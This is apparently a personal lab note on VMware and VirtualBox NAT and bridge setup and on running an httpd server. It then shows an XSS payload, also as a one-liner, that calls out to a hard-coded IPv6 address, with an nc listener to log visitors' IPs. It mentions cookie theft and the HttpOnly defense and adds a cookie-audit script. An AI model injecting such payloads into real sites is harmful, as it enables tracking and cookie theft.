# VMware NAT/Bridge Configuration/Http Server

[TOC]

## NAT

### Vmware

A virtual interface is created on the local host.

- `ens33` and VMnet8 are on the same LAN.

```
乙太網路卡 VMware Network Adapter VMnet8:

   連線特定 DNS 尾碼 . . . . . . . . :
   連結-本機 IPv6 位址 . . . . . . . : fe80::2447:1e2e:817e:4646%11
   IPv4 位址 . . . . . . . . . . . . : 192.168.203.1
   子網路遮罩 . . . . . . . . . . . .: 255.255.255.0
   預設閘道 . . . . . . . . . . . . .:
```

---

```
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
        inet 192.168.203.155 netmask 255.255.255.0 broadcast 192.168.203.255
        inet6 fe80::bf95:3305:da02:c0c1 prefixlen 64 scopeid 0x20<link>
        ether 00:0c:29:a3:42:bb txqueuelen 1000 (Ethernet)
        RX packets 72 bytes 17096 (16.6 KiB)
        RX errors 0 dropped 0 overruns 0 frame 0
        TX packets 106 bytes 11834 (11.5 KiB)
        TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
```

### Virtual Box

There are two interfaces:

- eth1 -> NAT
- eth2 -> Host only (for communicating with the host)

---

### NAT characteristics

- Protects the internal IP addresses.
- private IP -> public IP (SNAT)
- The external network cannot connect to the internal private IP.

## Bridge

Bridge to the phone's network (the Wi-Fi subnet). The VM will be on the same LAN as the phone's Wi-Fi.

### Configure (VMware)

First find out which network adapter is your Windows Wi-Fi adapter -> look it up in the Network and Sharing Center.

After configuring, reboot it.

## Setting up a public HTTP server (bridged to the phone's public IPv6 network)

Shut down the firewall. In the default zone (public), only the SSH port is open for connections, so firewalld has to be shut down for the test.

```
systemctl status firewalld   # look up the current status
systemctl stop firewalld     # stop
systemctl disable firewalld  # do not start again at boot
```

Firewall status

### Install httpd Server

```
yum install httpd -y
systemctl start httpd
```

Once the service is started, the web server can be accessed over HTTP.

```
systemctl start httpd.service
systemctl status httpd.service
```

### XSS Payload

```
<script>
const ipAddress = "[2402:7500:a0f:b7b2:36e8:378a:669e:8e07]"; // set the IP address
const port = "443"; // set the port number

fetch(`http://${ipAddress}:${port}`)
  .then(response => {
    if (response.ok) {
      return response.text();
    }
    throw new Error('Network response was not ok.');
  })
  .then(data => {
    console.log(data); // show the data returned by the server
  })
  .catch(error => {
    console.error('There was a problem with the fetch operation:', error);
  });
</script>
```

`;` can be used to chain the JS statements together:

```
const ipAddress = "[2402:7500:a0f:b7b2:36e8:378a:669e:8e07]"; const port = "443"; fetch(`http://${ipAddress}:${port}`).then(response => { if (response.ok) { return response.text(); } throw new Error('Network response was not ok.'); }).then(data => { console.log(data); }).catch(error => { console.error('There was a problem with the fetch operation:', error); });
```

### Receiving the connection information from the fetch sent when someone clicks through to this site

```
nc -lvnp 443
```

With this method we can collect the host IP of anyone who clicks the link.

### Defense: HttpOnly

This method can be used to steal cookies. However, when the web application sets HttpOnly on a cookie, JavaScript running in the DOM is blocked from reading it through `document.cookie`.
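
A check for the HttpOnly defense above, as an added example that is not part of the original note: it audits `Set-Cookie` header values and lists the cookies that page script could still read through `document.cookie`. It goes slightly beyond the note by also flagging missing `Secure` and `SameSite` attributes; the function names and the sample headers are constructed for illustration.

```javascript
// Added example: audit Set-Cookie header values for the HttpOnly defense.
// parseSetCookie, auditSetCookie and the sample headers are constructed here.

// Parse one Set-Cookie value into { name, attrs } with lower-cased attribute names.
function parseSetCookie(value) {
  const parts = value.split(';').map(p => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf('=');
  const name = eq === -1 ? parts[0] : parts[0].slice(0, eq);
  const attrs = new Map();
  for (const part of parts.slice(1)) {
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).toLowerCase();
    attrs.set(key, i === -1 ? true : part.slice(i + 1));
  }
  return { name, attrs };
}

// Return one finding per cookie that lacks a hardening attribute.
function auditSetCookie(headerValues) {
  const findings = [];
  for (const value of headerValues) {
    const { name, attrs } = parseSetCookie(value);
    const missing = [];
    if (!attrs.has('httponly')) missing.push('HttpOnly'); // readable via document.cookie
    if (!attrs.has('secure')) missing.push('Secure');     // also sent over plain http://
    if (!attrs.has('samesite')) missing.push('SameSite'); // cross-site policy left to browser default
    if (missing.length) findings.push({ name, missing });
  }
  return findings;
}

// Constructed sample: Set-Cookie values from a hypothetical login response.
const sampleHeaders = [
  'session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Path=/',
  'csrf=xyz; Secure; samesite=strict',
];

for (const f of auditSetCookie(sampleHeaders)) {
  console.log(`${f.name}: missing ${f.missing.join(', ')}`);
}
```

Feed it the `Set-Cookie` values from a real response (for example from `curl -sI`) to see which session cookies are still exposed to script.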